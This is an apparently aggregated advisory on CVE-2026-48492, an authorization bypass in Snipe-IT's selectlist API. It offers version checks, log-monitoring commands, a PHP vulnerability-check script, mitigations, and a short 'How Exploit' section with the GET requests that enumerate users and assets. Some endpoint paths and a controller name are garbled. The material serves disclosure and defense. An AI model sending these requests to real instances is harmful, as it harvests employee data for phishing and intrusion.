Listen to this Post
CVE-2026-48492 exposes a critical authorization bypass in Snipe-IT, an open‑source IT asset and license management system. Prior to version 8.6.1, the `GET /api/v1/{object}/selectlist` API endpoint lacks any permission verification. Any authenticated user—regardless of role or assigned privileges—can issue a simple GET request carrying only their session cookie and retrieve a paginated list of all active user accounts. No API token, administrative rights, or special headers are required.
The flaw resides in the application‑level logic of multiple API controllers: AccessoriesController, AssetsController, onsumablesController, LicensesController, and UsersController. Before the patch, their `selectlist` methods executed database queries without invoking Laravel’s authorization gate, allowing unrestricted data exposure. The endpoint is designed to supply dropdown options for front‑end forms, but the missing `$this->authorize(‘view.selectlists’)` check turns it into an unrestricted enumeration vector.
When FMCS (First Name, Middle Name, Surname) is disabled, the response includes usernames, display names, employee numbers, and user IDs for every active account. If FMCS is enabled, the exposure is limited to users within the same company, but still leaks usernames and company associations. This information can fuel credential‑stuffing attacks, targeted phishing, social engineering, and internal reconnaissance.
The vulnerability is trivial to exploit—an attacker only needs a valid session cookie, which can be obtained via basic authentication or social engineering. The attack is remote, requires no special tools, and can be repeated indefinitely. The CVSSv3 base score is 4.3 (Medium), reflecting the low complexity and network attack vector, but the real‑world impact is elevated because the leaked data often correlates with physical security systems, email addresses, and privileged accounts.
The patch in version 8.6.1 introduces an explicit authorization check in each `selectlist` method, ensuring that only users with the `view.selectlists` permission can access the endpoint. The fix also reinforces the principle of least privilege across the API layer. Organizations still running versions prior to 8.6.1 remain exposed until they upgrade or apply a temporary workaround.
DailyCVE Form:
Platform: Snipe-IT
Version: < 8.6.1
Vulnerability: Auth bypass
Severity: Medium (4.3)
date: 2026-07-08
Prediction: 2026-07-15
What Undercode Say: Analytics
The following analytics commands can be used to detect whether your Snipe‑IT instance is vulnerable and to monitor for suspicious API access:
Check current Snipe-IT version via artisan
php artisan snipe-it:version
Alternatively, inspect the composer.lock file
grep -A 5 '"name":"snipe/snipe-it"' composer.lock | grep version
Monitor API access logs for the selectlist endpoint
tail -f storage/logs/laravel.log | grep -i "selectlist"
Count requests to the vulnerable endpoint per user (requires access to web server logs)
sudo grep -c "/api/v1/./selectlist" /var/log/nginx/access.log
Extract user IDs and IPs hitting the endpoint
sudo grep "/api/v1/./selectlist" /var/log/nginx/access.log | awk '{print $1, $7}' | sort | uniq -c
Detection script (PHP) to verify if the endpoint returns data without proper authorization:
<?php
// Run this from a machine with a valid Snipe-IT session cookie
$cookie = 'laravel_session=YOUR_SESSION_COOKIE';
$ch = curl_init('https://your-snipe-instance/api/v1/users/selectlist?limit=5');
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: $cookie"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($httpCode === 200 && strpos($response, '"rows"') !== false) {
echo "VULNERABLE: selectlist returned user data without authorization.\n";
} else {
echo "Not vulnerable or endpoint restricted.\n";
}
?>
How Exploit:
An attacker can exploit this vulnerability with a single authenticated GET request:
GET /api/v1/users/selectlist?limit=100&page=1 HTTP/1.1 Host: target-snipe.example.com Cookie: laravel_session=eyJpdiI6...; XSRF-TOKEN=...
The server responds with a JSON payload containing `rows` array, each entry including id, name, display_name, employee_num, and `avatar` – effectively enumerating all active user accounts.
The same pattern works for other object types:
GET /api/v1/assets/selectlist?limit=100 GET /api/v1/licenses/selectlist?limit=100 GET /api/v1/accessories/selectlist?limit=100 GET /api/v1/consumables/selectlist?limit=100
Because no authorization check is performed, even a newly registered, unprivileged user can harvest the entire user directory in minutes using a simple loop.
Protection:
- Upgrade to Snipe‑IT version 8.6.1 or later – this is the only complete fix. The patch adds `$this->authorize(‘view.selectlists’);` to each vulnerable controller method.
- If immediate upgrade is not possible, revoke session tokens for all non‑admin users and enforce re‑authentication after applying the patch.
- Deploy a WAF rule to block requests to `/api/v1//selectlist` for unprivileged users (e.g., based on role claim in session).
- Monitor and alert on excessive `selectlist` API calls – a single user fetching multiple pages in a short time is a strong indicator of enumeration.
- Restrict network access to the Snipe‑IT API endpoint using a reverse proxy or firewall, allowing only trusted IP ranges if feasible.
Impact:
- Confidentiality breach – usernames, display names, employee numbers, and user IDs are exposed to any authenticated user, enabling internal reconnaissance.
- Increased phishing risk – attackers can map employee identifiers to real names and craft highly targeted spear‑phishing campaigns.
- Credential stuffing – exposed usernames can be combined with breached passwords from other services to compromise accounts.
- Physical security threats – if employee numbers correlate with building access or badge systems, an attacker gains intelligence for physical intrusion.
- Compliance violations – exposure of employee‑related data may contravene GDPR, HIPAA, or other privacy regulations, leading to fines and reputational damage.
- Lateral movement – the enumerated user list helps attackers identify high‑value targets (admins, executives) for subsequent social engineering or privilege escalation attempts.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

